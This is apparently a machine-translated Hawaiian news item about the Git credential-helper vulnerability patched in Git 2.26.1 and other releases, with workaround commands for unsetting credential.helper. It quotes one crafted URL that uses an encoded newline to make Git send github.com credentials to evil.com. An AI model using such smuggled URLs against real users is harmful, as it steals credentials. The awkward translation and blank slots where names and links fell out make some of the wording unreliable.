nā hoʻokuʻu hoʻoponopono o ka ʻōnaehana mana kumu i puʻunaue ʻia ʻo Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 a me 2.17.4, ma ka mea i hoopau () i ka mea lawe lima "", ka mea e hoʻouna ʻia ai nā hōʻoia i ka mea hoʻokipa hewa ke komo ka mea kūʻai aku git i kahi waihona me ka hoʻohana ʻana i kahi URL i hoʻohālikelike ʻia me kahi ʻano laina hou. Hiki ke hoʻohana ʻia ka nāwaliwali e hoʻonohonoho i nā hōʻoia mai kahi pūʻali ʻē aʻe e hoʻouna ʻia i kahi kikowaena i mālama ʻia e ka mea hoʻouka.
Ke hōʻike nei i kahi URL e like me "https://evil.com?%0ahost=github.com/", ʻo ka mea hoʻokele hōʻoia i ka wā e hoʻopili ai i ka host evil.com e hāʻawi i nā ʻāpana hōʻoia i kuhikuhi ʻia no github.com. Loaʻa ka pilikia i ka wā e hana ai i nā hana e like me "git clone", me ka hoʻoili ʻana i nā URL no nā submodules (no ka laʻana, ʻo "git submodule update" e hana aunoa i nā URL i kuhikuhi ʻia ma ka faila .gitmodules mai ka waihona). ʻOi aku ka pōʻino o ka vulnerability i nā kūlana kahi e hoʻopili ai ka mea hoʻomohala i kahi waihona me ka ʻole o ka ʻike ʻana i ka URL, no ka laʻana, i ka wā e hana ai me nā submodules, a i ʻole i nā ʻōnaehana e hana i nā hana maʻalahi, no ka laʻana, i nā palapala kūkulu pūʻulu.
No ka pale ʻana i nā nāwaliwali i nā mana hou ka hele ʻana i kahi ʻano laina hou i nā waiwai i hoʻouna ʻia ma o ka protocol exchange credential. No ka hāʻawi ʻana, hiki iā ʻoe ke hahai i ka hoʻokuʻu ʻana o nā hōʻano hou ma nā ʻaoʻao , , , , , , .
Ma ke ʻano he hana e pale ai i ka pilikia Mai hoʻohana i ka credential.helper i ke komo ʻana i nā waihona waihona lehulehu a mai hoʻohana i ka "git clone" ma ke ʻano "--recurse-submodules" me nā waihona i nānā ʻole ʻia. E hoʻopau loa i ka credential.helper handler, ʻo ia hoʻi a me ka lawe ʻana i nā ʻōlelo huna mai , hoomaluia a i ʻole he faila me nā ʻōlelo huna, hiki iā ʻoe ke hoʻohana i nā kauoha:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru